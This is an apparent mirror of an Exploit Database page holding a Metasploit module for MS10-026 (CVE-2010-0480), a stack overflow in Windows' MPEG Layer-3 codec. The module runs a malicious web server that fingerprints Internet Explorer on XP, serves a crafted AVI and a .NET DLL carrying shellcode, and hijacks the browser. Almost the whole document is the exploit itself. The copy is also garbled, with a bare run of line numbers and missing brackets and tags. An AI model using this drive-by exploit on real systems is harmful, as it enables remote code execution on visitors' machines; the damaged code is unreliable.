Microsoft MPEG Layer-3 Audio – Stack Overflow (MS10-026) (Metasploit)

Exploit Database
115 阅读

作者： Metasploit

日期： 2011-08-13
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/17659/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

# $Id: ms10_026_avi_nsamplespersec.rb 13555 2011-08-13 02:15:05Z sinn3r $

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info = {})

super(update_info(info,

'Name' => 'MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow',

'Description'=> %q{

This module exploits a buffer overlow in l3codecx.ax while processing a

AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite

with 0's so the three least significant bytes of EIP saved on stack are

overwritten and shellcode is mapped using the .NET DLL memory technique pioneered

by Alexander Sotirov and Mark Dowd.

Please note on IE 8 targets, your malicious URL must be a trusted site in order

to load the .Net control.

'Author' =>

[

'Yamata Li', # Vulnerability Discovery

'Shahin Ramezany <shahin[at]abysssec.com', # Vulnerability Analysis and Exploit

'juan vazquez', # Metasploit module

'Jordi Sanchez <jsanchez[at]0x01000000.org>', # Metasploit module - Help

'License'=> MSF_LICENSE,

'Version'=> '$Revision: 13555 $',

'References' =>

[

['CVE', '2010-0480'],

['OSVDB', '63749'],

['BID', '39303'],

['MSB', 'MS10-026'],

['URL', 'http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/'],

['URL', 'http://www.phreedom.org/research/bypassing-browser-memory-protections/']

'Payload'=>

{

'Space'=> 4000

'DefaultOptions' =>

{

'InitialAutoRunScript' => 'migrate -f',

'Targets'=>

[

# Target 0: Automatic

# Tested with:

# Windows XP SP3 English IE 6

# Windows XP SP3 English IE 7

# Windows XP SP3 English IE 8: The exploiting site must be a trusted

# site to load the .NET control

# .NET CLR required

[

'Windows XP SP3 Automatic',

{

'Platform' => 'win',

'Ret' => 0x72000000

]

'DefaultTarget'=> 0,

'DisclosureDate' => 'Apr 13 2010'))

end

def exploit

# Embed our payload in a .Net binary

ibase = target.ret - 0x10000

shellcode = rand_text_alpha(target.ret - ibase - 0x2285)

shellcode << payload.encoded

#Use our own custom .Net binary, because we require a much bigger file

#to land our payload at the right place

opts = {

:template=> 'template_dotnetmem.dll',

:text_offset => 0x1285,

:text_max=> 0x20000,

:pack=> 'a131072',

:uuid_offset => 135816

}

@dotnet_payload = Msf::Util::EXE.to_dotnetmem(ibase, shellcode, opts)

# Load our AVI file

path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-0480.avi")

f = File.open(path, "rb")

@trigger = f.read(f.stat.size)

f.close

super

end

def on_request_uri(cli, request)

agent = request['User-Agent']

case request['User-Agent']

when /MSIE.*Windows NT 5\.1.*\.NET CLR .*/

when /Windows-Media-Player/

# AVI is requested by WMP

else

send_not_found(cli)

print_error("#{cli.peerhost}:#{cli.peerport} - target not supported: #{agent}")

return

end

if (request.uri =~ /\.html/i)

avi_name = rand_text_alpha(4)

avi_trigger = ""

if ("/" == get_resource[-1,1])

avi_trigger = get_resource[0, get_resource.length - 1]

else

avi_trigger = get_resource

end

avi_trigger << "/#{avi_name}.avi"

html = %Q|<html>

<body>

<OBJECT ID="MediaPlayer"

CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95"

CODEBASE="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#

Version=5,1,52,701" STANDBY="Loading Microsoft Windows Media Player components..."

TYPE="application/x-oleobject" width="280" height="46">

pluginspage="http://www.microsoft.com/Windows/MediaPlayer/"

src="https://www.exploit-db.com/exploits/17659/#{avi_trigger}"

name="MediaPlayer"

width=280

height=46

autostart=1

showcontrols=1

volume=-300>

</embed>

</OBJECT>

</body>

</html>

html = html.gsub(/^\t\t\t/, '')

print_status("Sending trigger loader to #{cli.peerhost}:#{cli.peerport}...")

send_response_html(cli, html)

elsif (request.uri =~ /\.avi$/i)

print_status "Sending AVI trigger to #{cli.peerhost}:#{cli.peerport} ..."

send_response(cli, @trigger, { 'Content-Type' => 'application/octet-stream' })

return

elsif (request.uri =~ /\.dll$/i)

print_status "Sending DLL file to #{cli.peerhost}:#{cli.peerport} ..."

send_response(

cli,

@dotnet_payload,

{

'Content-Type' => 'application/x-msdownload',

'Connection' => 'close',

'Pragma' => 'no-cache'

}

)

return

end

html_name = rand_text_alpha(4)

dll_uri = ""

html_trigger = ""

if ("/" == get_resource[-1,1])

dll_uri = get_resource[0, get_resource.length - 1]

html_trigger = get_resource[0, get_resource.length - 1]

else

dll_uri = get_resource

html_trigger = get_resource

end

dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll"

js_net_dll = "<object classid=\"#{dll_uri}\"#GenericControl\"><object>"

html_trigger << "/#{html_name}.html"

html= %Q|<html>

<head>

function forward() {

window.location = window.location + '#{html_trigger}';

}

function start() {

setTimeout("forward()", 2000);

}

</script>

</head>

</body>

</html>

html = html.gsub(/^\t\t/, '')

print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

send_response_html(cli, html)

end